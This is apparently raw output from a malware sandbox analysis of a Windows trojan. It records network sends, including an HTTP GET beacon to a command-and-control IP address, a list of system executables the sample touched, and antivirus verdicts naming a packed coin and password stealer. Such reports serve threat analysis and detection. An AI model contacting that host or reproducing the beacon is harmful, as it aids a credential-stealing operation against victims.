 buffer: póûŽuèE͇FGkp’C*æÅì£Ù£P‘³RÖz$ ä#hNÎÊ&PÂ$¼8:ÕX «ã~¸µÛ³ j#ù­¾÷¨:ѾA“£S[V‰ž® çȏNe0ò/¼g‰¹ÒÇ<ŠÝ/ãmt“>-a
socket: 1256
sent: 117
1 117 0

send

 buffer: GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1 Host: 195.123.226.82 Connection: Keep-Alive
socket: 1168
sent: 128
1 128 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.67448968
McAfee Artemis!F7D6BD06F964
Malwarebytes Crypt.Trojan.Malicious.DDS
VIPRE Trojan.GenericKD.67448968
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Generic.D4053088
Cyren W32/ABRisk.JHSG-8484
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Kryptik_AGen.BSD
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.Win32.Coins.gen
BitDefender Trojan.GenericKD.67448968
Avast Win32:CrypterX-gen [Trj]
Tencent Win32.Trojan-QQPass.QQRob.Vgil
Emsisoft Trojan.GenericKD.67448968 (B)
F-Secure Trojan.TR/Kryptik.bxgvi
TrendMicro TrojanSpy.Win32.TMLOADER.YXDFIZ
McAfee-GW-Edition BehavesLike.Win32.PUPXTU.fh
Trapmine malicious.high.ml.score
FireEye Generic.mg.f7d6bd06f9643978
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Scar.mpn
Avira TR/Kryptik.bxgvi
MAX malware (ai score=81)
Antiy-AVL Trojan/Win32.Kryptik
Gridinsoft Ransom.Win32.Sabsik.cl
Microsoft Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm HEUR:Trojan-PSW.Win32.Coins.gen
GData Trojan.GenericKD.67448968
Google Detected
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36250.xC0@am20nIgi
ALYac Trojan.GenericKD.67448968
VBA32 BScope.TrojanPSW.Coins
Cylance unsafe
TrendMicro-HouseCall TrojanSpy.Win32.TMLOADER.YXDFIZ
Rising Trojan.Generic@AI.97 (RDML:SyFX+TNVNHWNj5WBLAFzRQ)
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Kryptik_AGen.BSD!tr
AVG Win32:CrypterX-gen [Trj]
Cybereason malicious.6f9643
DeepInstinct MALICIOUS